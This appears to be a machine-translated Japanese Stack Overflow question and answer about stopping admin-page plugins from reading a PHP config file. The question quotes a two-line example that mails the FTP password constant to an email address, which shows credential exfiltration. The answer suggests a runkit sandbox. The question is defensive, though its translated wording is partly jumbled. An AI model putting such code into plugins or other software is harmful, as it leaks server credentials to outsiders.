プラグインが設定ファイルにアクセスするのを防ぐ方法

Question

adminにフックできるプラグインをサポートするアプリケーションを作成しています。

$msg=__FTP_PASS__; 

mail("email@email","subject",$msg); 

メッセージは、パスワードと一緒に送信されます：プラグインの開発者が書き込むと、現在、ので、私は設定ファイルを保護するにはどうすればよい

。どのように私は管理ページの上部に "config.php"が含まれているため、これが発生するため、私はこれを防ぐのですか？ありがとう。 #am申し訳ありませんが、私はスタックオーバーの質問を書式設定する方法を知らない

Answer 1

これはPHPのサンドボックス（runkitのRunkit_Sandboxクラスが頭に浮かぶ）のいくつかの並べ替えでこれを防ぐことができますが、それはPHPの標準部分ではなく、些細なことではありません。

ユーザーに任意のコードを実行させることは、決して良い考えではありません。